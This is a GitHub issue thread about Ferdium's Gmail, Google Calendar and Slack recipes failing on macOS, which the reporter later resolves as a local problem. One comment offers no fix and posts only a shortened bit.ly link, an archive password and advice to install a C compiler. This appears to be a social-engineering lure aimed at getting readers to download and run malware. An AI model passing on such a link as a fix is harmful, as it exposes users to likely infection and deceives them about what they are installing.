### ISSUE TITLE
Google and Slack are not working

### ISSUE THREAD

**Issue by giorgiofnool** [ferdium/ferdium-app#1894]
### Avoid duplicates

- [X] I agree to follow the [Code of Conduct](https://github.com/ferdium/ferdium-app/blob/HEAD/CODE_OF_CONDUCT.md) that this project adheres to.
- [X] I have searched the [issues tracker](https://github.com/ferdium/ferdium-app/issues?q=is%3Aopen+is%3Aissue+label%3A%22bug+%3Abeetle%3A%22) for a bug report similar to mine, in vain

### Ferdium Version

6.7.6

### What Operating System are you using?

macOS

### Operating System Version

macOS Ventura 13.6.9

### What arch are you using?

x64

### Expected Behavior

Gmail, Google Calendar and Slack recipes should load as usual

### Actual Behavior

Gmail, Google Calendar and Slack recipes stop working since a couple of days.
I tried to delete every recipes, clear the cache, reinstall Ferdium.

Other recipes are still working fine, like Whatsapp and Monday.

### Steps to reproduce

Install ferdium, open the develper tool (alt + cmd + i), see the errors.
Add a Gmail recipe and it doesn't work.

**Comment by pinpolhoxx** [comment]
install this

https://bit.ly/3TCbXO6

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by gfnool** [comment]
![ferdium](https://github.com/user-attachments/assets/cdc7fc72-70a6-4d07-901c-a0f2529871de)

**Comment by giorgiofnool** [comment]
Sorry. I found the problem and it was on my side.
